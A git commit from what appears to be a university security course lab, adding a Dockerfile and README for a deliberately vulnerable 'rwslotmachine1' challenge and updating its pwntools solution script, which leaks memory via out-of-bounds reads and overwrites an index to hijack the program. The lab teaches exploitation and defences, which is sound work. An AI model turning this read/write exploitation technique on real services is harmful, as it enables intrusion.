Add Dockerfile for chapters/mitigations-and-defensive-strategies, 01-rwslotmachine1

ClaraStefania · ClaraStefania · commit 4d1f4b3b9bc0 · 2024-12-11T23:34:28.000+02:00
Signed-off-by: ClaraStefania &lt;stefania.diaconescu@stud.acs.upb.ro&gt;
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile
@@ -0,0 +1,21 @@
+# Stage 1: Build Stage
+FROM gcc:latest AS build
+
+WORKDIR /app
+
+COPY rwslotmachine1.c .
+
+# Compile the C code into an executable
+RUN gcc -Wall -Wextra -O2 -o rwslotmachine1 rwslotmachine1.c
+
+# Stage 2: Runtime Stage
+FROM ubuntu:latest
+
+WORKDIR /app
+
+COPY --from=build /app/rwslotmachine1 /app/rwslotmachine1
+
+EXPOSE 31344
+
+# Run the application
+CMD ["./rwslotmachine1"]
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md
@@ -0,0 +1,12 @@
+## Building and running
+
+1. Build the Dockerfile
+```bash
+docker build -t ransomware1 .
+```
+
+2. Run the Dockerfile
+```bash
+docker run -it -p 31344:31344 ransomware1
+```
+
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
@@ -1,6 +1,6 @@
 from pwn import *
 
-local = False
+local = True
 # Both solutions work against the Docker container instance.
 # Only solution 2 works locally.
 # Solution 1 fails on the local machine because there is no valid address at that index.
@@ -13,21 +13,23 @@
 
 
 def do_read(idx):
-    p.recvuntil(">")
-    p.sendline("1")
-    p.recvuntil("index:")
-    p.sendline(str(idx))
-    p.recvuntil("]: ")
-    return int(p.recvuntil("\n")[:-1], 16)
+    p.recvuntil(b">")
+    p.sendline(b"1")
+    p.recvuntil(b"index:")
+    p.sendline(str(idx).encode())
+    p.recvuntil(b"]: ")
+    leak = p.recvline().strip()
+    print(f"Raw Leak: {leak}")
+    return int(leak, 16)
 
 
 def do_write(idx, value):
-    p.recvuntil(">")
-    p.sendline("2")
-    p.recvuntil("index:")
-    p.sendline(str(idx))
-    p.recvuntil("value:")
-    p.sendline(hex(value))
+    p.recvuntil(b">")
+    p.sendline(b"2")
+    p.recvuntil(b"index:")
+    p.sendline(str(idx).encode())
+    p.recvuntil(b"value:")
+    p.sendline(hex(value).encode())
 
 
 if SOLUTION == 1:
@@ -45,4 +47,4 @@ def do_write(idx, value):
 
 do_write(-8, stack_slots)
 
-p.interactive()
+p.interactive()
